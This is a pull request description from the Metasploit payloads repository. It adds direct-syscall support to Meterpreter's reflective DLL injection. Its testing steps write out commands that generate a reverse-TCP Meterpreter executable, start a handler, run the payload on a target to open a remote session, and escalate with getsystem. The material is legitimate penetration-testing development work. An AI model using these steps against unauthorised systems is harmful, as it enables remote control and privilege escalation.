rapid7/metasploit-payloads
# Pull in changes from ReflectiveDLLInjection to support direct syscalls (2)

This PR adds the necessary changes to support the direct syscalls version of `ReflectiveDLLInjection`. This is a new implementation based on this first [PR](https://github.com/rapid7/metasploit-payloads/pull/688). At this time, the related [PR](https://github.com/rapid7/ReflectiveDLLInjection/pull/16) in `ReflectiveDLLInjection` repository is still under review but it is possible to test by updating the `ReflectiveDLLInjection` submodule reference:
```
cd c/meterpreter/source/ReflectiveDLLInjection
git remote add rdi_direct_syscalls git@github.com:cdelafuente-r7/ReflectiveDLLInjection.git
git fetch rdi_direct_syscalls
git checkout rdi_direct_syscalls/direct_syscalls_fix_win10x86
```
Don't forget to `git fetch`/`git checkout` again if the `ReflectiveDLLInjection` branch is updated.

Follow the standard [documentation](https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter) to build Meterpreter on Windows and with MinGW.

## Testing with MSF
Once the DLL's are built, you need to copy `output/` directory content into the Metasploit Framework's `data/meterpreter/` directory.

Then in MSF console, test Meterpreter payloads (staged and single).
For example:
- `use windows/x64/meterpreter_reverse_tcp`
- `set LHOST <your host IP>`
- `generate -f exe -o direct_syscalls_payload.exe`
- `to_handler`
- move `direct_syscalls_payload.exe` to the target and execute it, you should get a session.
- make sure you get the warning saying local DLLs are being used: `WARNING: Local file  .../data/meterpreter/ext_server_stdapi.x64.dll is being used`
- make sure you load extensions, migrate,  `getsystem`, etc. without issues.
